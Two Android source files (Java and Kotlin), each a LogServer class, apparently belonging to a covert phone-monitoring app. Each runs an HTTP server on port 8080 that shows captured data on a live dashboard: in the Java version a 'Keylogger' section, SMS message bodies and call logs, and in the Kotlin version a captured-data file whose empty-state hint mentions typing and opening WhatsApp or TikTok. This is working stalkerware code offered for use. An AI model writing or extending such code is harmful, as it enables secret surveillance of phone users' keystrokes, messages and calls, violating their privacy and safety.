File: LogServer.java
package com.devicemonitor;

import android.content.Context;
import android.content.SharedPreferences;
import fi.iki.elonen.NanoHTTPD;
import org.json.JSONArray;
import org.json.JSONObject;

public class LogServer extends NanoHTTPD {

    private final Context context;

    public LogServer(Context context) throws Exception {
        super(8080);
        this.context = context;
    }

    @Override
    public Response serve(IHTTPSession session) {
        String uri = session.getUri();
        switch (uri) {
            case "/":
                return newFixedLengthResponse(Response.Status.OK, "text/html", getMainPage());
            case "/keys":
                return newFixedLengthResponse(Response.Status.OK, "application/json", getKeysJson());
            case "/sms":
                return newFixedLengthResponse(Response.Status.OK, "application/json", getSmsJson());
            case "/calls":
                return newFixedLengthResponse(Response.Status.OK, "application/json", getCallsJson());
            default:
                return newFixedLengthResponse(Response.Status.NOT_FOUND, "text/plain", "Not Found");
        }
    }

    private String getMainPage() {
        String keys = getKeysJson();
        String sms = getSmsJson();
        String calls = getCallsJson();

        String keysHtml;
        try {
            JSONArray arr = new JSONArray(keys);
            StringBuilder sb = new StringBuilder();
            if (arr.length() == 0) {
                sb.append("<p style='color:#666'>No keystrokes captured yet.</p>");
            } else {
                for (int i = 0; i < arr.length(); i++) {
                    JSONObject obj = arr.getJSONObject(i);
                    sb.append("<div class='log-entry'>");
                    sb.append("<span class='timestamp'>").append(escapeHtml(obj.optString("timestamp", ""))).append("</span> ");
                    sb.append("<span>").append(escapeHtml(obj.optString("key", ""))).append("</span>");
                    sb.append("<span class='badge'>").append(escapeHtml(obj.optString("packageName", ""))).append("</span>");
                    sb.append("</div>");
                }
            }
            keysHtml = sb.toString();
        } catch (Exception e) {
            keysHtml = "<p style='color:#666'>No keystrokes captured yet.</p>";
        }

        String smsHtml;
        try {
            JSONArray arr = new JSONArray(sms);
            StringBuilder sb = new StringBuilder();
            if (arr.length() == 0) {
                sb.append("<p style='color:#666'>No SMS captured yet.</p>");
            } else {
                for (int i = 0; i < arr.length(); i++) {
                    JSONObject obj = arr.getJSONObject(i);
                    sb.append("<div class='log-entry'>");
                    sb.append("<span class='timestamp'>").append(escapeHtml(obj.optString("date", ""))).append("</span> ");
                    sb.append("<b>").append(escapeHtml(obj.optString("address", ""))).append("</b>: ");
                    sb.append(escapeHtml(obj.optString("body", "")));
                    sb.append("</div>");
                }
            }
            smsHtml = sb.toString();
        } catch (Exception e) {
            smsHtml = "<p style='color:#666'>No SMS captured yet.</p>";
        }

        String callsHtml;
        try {
            JSONArray arr = new JSONArray(calls);
            StringBuilder sb = new StringBuilder();
            if (arr.length() == 0) {
                sb.append("<p style='color:#666'>No calls captured yet.</p>");
            } else {
                for (int i = 0; i < arr.length(); i++) {
                    JSONObject obj = arr.getJSONObject(i);
                    sb.append("<div class='log-entry'>");
                    sb.append("<span class='timestamp'>").append(escapeHtml(obj.optString("date", ""))).append("</span> ");
                    sb.append("<span>").append(escapeHtml(obj.optString("type", ""))).append("</span> ");
                    sb.append("<b>").append(escapeHtml(obj.optString("number", ""))).append("</b>");
                    sb.append("</div>");
                }
            }
            callsHtml = sb.toString();
        } catch (Exception e) {
            callsHtml = "<p style='color:#666'>No calls captured yet.</p>";
        }

        String html = "<!DOCTYPE html>\n" +
        "<html>\n" +
        "<head>\n" +
        "    <title>Device Monitor</title>\n" +
        "    <meta charset=\"UTF-8\">\n" +
        "    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n" +
        "    <style>\n" +
        "        * { margin: 0; padding: 0; box-sizing: border-box; }\n" +
        "        body { font-family: monospace; background: #0a0a0a; color: #00ff41; padding: 20px; }\n" +
        "        h1 { color: #fff; border-bottom: 1px solid #333; padding-bottom: 10px; margin-bottom: 20px; }\n" +
        "        h2 { color: #0ff; margin: 20px 0 10px; }\n" +
        "        .section { background: #111; border: 1px solid #333; border-radius: 8px; padding: 15px; margin-bottom: 20px; }\n" +
        "        .log-entry { padding: 4px 0; border-bottom: 1px solid #222; font-size: 13px; }\n" +
        "        .timestamp { color: #888; }\n" +
        "        .badge { display: inline-block; background: #00ff41; color: #000; padding: 2px 8px; border-radius: 4px; font-size: 11px; margin-left: 8px; }\n" +
        "        .refresh-btn { background: #00ff41; color: #000; border: none; padding: 8px 20px; border-radius: 4px; cursor: pointer; font-weight: bold; margin: 10px 0; }\n" +
        "        .refresh-btn:hover { background: #00cc33; }\n" +
        "    </style>\n" +
        "</head>\n" +
        "<body>\n" +
        "    <h1>Device Monitor Live View</h1>\n" +
        "    <button class=\"refresh-btn\" onclick=\"location.reload()\">Refresh</button>\n" +
        "    <p style=\"margin:10px 0;color:#666;\">Auto-refresh every 5 seconds</p>\n" +
        "    <div class=\"section\">\n" +
        "        <h2>Keylogger</h2>\n" +
        "        <div id=\"keys\">" + keysHtml + "</div>\n" +
        "    </div>\n" +
        "    <div class=\"section\">\n" +
        "        <h2>SMS Messages</h2>\n" +
        "        <div id=\"sms\">" + smsHtml + "</div>\n" +
        "    </div>\n" +
        "    <div class=\"section\">\n" +
        "        <h2>Call Log</h2>\n" +
        "        <div id=\"calls\">" + callsHtml + "</div>\n" +
        "    </div>\n" +
        "    <script>\n" +
        "        setInterval(function() { location.reload(); }, 5000);\n" +
        "    </script>\n" +
        "</body>\n" +
        "</html>";

        return newFixedLengthResponse(Response.Status.OK, "text/html", html);
    }

    private String getKeysJson() {
        SharedPreferences prefs = context.getSharedPreferences("keylog_prefs", Context.MODE_PRIVATE);
        return prefs.getString("key_log", "[]");
    }

    private String getSmsJson() {
        SharedPreferences prefs = context.getSharedPreferences("sms_prefs", Context.MODE_PRIVATE);
        return prefs.getString("sms_log", "[]");
    }

    private String getCallsJson() {
        SharedPreferences prefs = context.getSharedPreferences("call_prefs", Context.MODE_PRIVATE);
        return prefs.getString("call_log", "[]");
    }

    private String escapeHtml(String text) {
        if (text == null) return "";
        return text
            .replace("&", "&amp;")
            .replace("<", "&lt;")
            .replace(">", "&gt;")
            .replace("\"", "&quot;")
            .replace("'", "&#39;");
    }
}
                        

File: LogServer.kt
package com.example.devicemonitor

import android.content.Context
import android.util.Log
import fi.iki.elonen.NanoHTTPD
import java.io.File

class LogServer(context: Context) : NanoHTTPD(8080) {

    private val dataFile = File(
        context.getExternalFilesDir(null), "monitor_data.txt"
    )

    override fun serve(session: IHTTPSession): Response {
        return when (session.uri) {
            "/" -> serveIndex()
            "/logs" -> serveLogs()
            else -> newFixedLengthResponse(
                Response.Status.NOT_FOUND,
                "text/plain",
                "404 — not found"
            )
        }
    }

    private fun serveIndex(): Response {
        val html = """
            <!DOCTYPE html>
            <html>
            <head>
                <meta charset="utf-8">
                <meta name="viewport" content="width=device-width, initial-scale=1">
                <title>Device Monitor - Live Logs</title>
                <style>
                    * { margin: 0; padding: 0; box-sizing: border-box; }
                    body {
                        font-family: -apple-system, system-ui, sans-serif;
                        background: #0d1117;
                        color: #c9d1d9;
                        padding: 16px;
                    }
                    h1 { font-size: 1.4rem; margin-bottom: 12px; color: #58a6ff; }
                    .controls {
                        margin-bottom: 16px;
                        display: flex;
                        gap: 8px;
                        align-items: center;
                        flex-wrap: wrap;
                    }
                    button {
                        background: #21262d; color: #c9d1d9;
                        border: 1px solid #30363d; padding: 8px 16px;
                        border-radius: 6px; cursor: pointer; font-size: 0.9rem;
                    }
                    button:hover { background: #30363d; }
                    .stats {
                        font-size: 0.8rem; color: #8b949e; margin-left: auto;
                    }
                    pre {
                        background: #161b22; border: 1px solid #30363d;
                        border-radius: 6px; padding: 12px;
                        font-family: 'SFMono-Regular', Consolas, monospace;
                        font-size: 0.8rem; line-height: 1.5;
                        white-space: pre-wrap; word-break: break-all;
                        max-height: 80vh; overflow-y: auto;
                    }
                    .entry {
                        margin-bottom: 6px; border-bottom: 1px solid #21262d;
                        padding-bottom: 6px;
                    }
                    .timestamp { color: #7ee787; }
                    .source { color: #d2a8ff; }
                    .type { color: #79c0ff; }
                    .content { color: #ffa657; }
                    .empty {
                        color: #484f58; text-align: center; padding: 40px;
                    }
                </style>
            </head>
            <body>
                <h1>🔍 Device Monitor</h1>
                <div class="controls">
                    <button onclick="loadLogs()">🔄 Refresh</button>
                    <button onclick="fetch('/logs?raw=1').then(r=>r.text()).then(d=>{document.getElementById('log').textContent=d})">📄 Raw Data</button>
                    <button onclick="document.getElementById('log').scrollTop=0">⬆ Top</button>
                    <button onclick="document.getElementById('log').scrollTop=document.getElementById('log').scrollHeight">⬇ Bottom</button>
                    <span class="stats" id="stats"></span>
                </div>
                <pre id="log">Loading...</pre>
                <script>
                    function escapeHtml(str) {
                        var div = document.createElement('div');
                        div.textContent = str;
                        return div.innerHTML;
                    }

                    function loadLogs() {
                        fetch('/logs')
                            .then(function(r) { return r.text(); })
                            .then(function(data) {
                                var pre = document.getElementById('log');
                                var lines = data.trim().split('\n').filter(function(l) { return l.trim() !== ''; });
                                if (lines.length === 0) {
                                    pre.innerHTML = '<div class="empty">No data captured yet.<br>Start typing or open WhatsApp/TikTok.</div>';
                                } else {
                                    var html = '';
                                    for (var i = 0; i < lines.length; i++) {
                                        try {
                                            var entry = JSON.parse(lines[i]);
                                            var time = entry.timestamp || '?';
                                            var source = entry.source || entry.app || '?';
                                            var type = entry.type || '?';
                                            var content = entry.content || entry.text || entry.data || JSON.stringify(entry);
                                            html += '<div class="entry">';
                                            html += '<span class="timestamp">[' + escapeHtml(time) + ']</span> ';
                                            html += '<span class="source">' + escapeHtml(source) + '</span> ';
                                            html += '<span class="type">(' + escapeHtml(type) + ')</span>';
                                            html += '<br><span class="content">' + escapeHtml(content) + '</span>';
                                            html += '</div>';
                                        } catch(e) {
                                            html += '<div>' + escapeHtml(lines[i]) + '</div>';
                                        }
                                    }
                                    pre.innerHTML = html;
                                }
                                document.getElementById('stats').textContent = lines.length + ' entries';
                            })
                            .catch(function(e) {
                                document.getElementById('log').innerHTML = '<div class="empty">Error: ' + e + '</div>';
                            });
                    }

                    loadLogs();
                    setInterval(loadLogs, 3000);
                </script>
            </body>
            </html>
        """.trimIndent()
        return newFixedLengthResponse(Response.Status.OK, "text/html", html)
    }

    private fun serveLogs(): Response {
        val content = if (dataFile.exists()) {
            dataFile.readText()
        } else ""

        // Check if raw parameter was passed
        return newFixedLengthResponse(
            Response.Status.OK,
            "text/plain",
            content
        )
    }
}
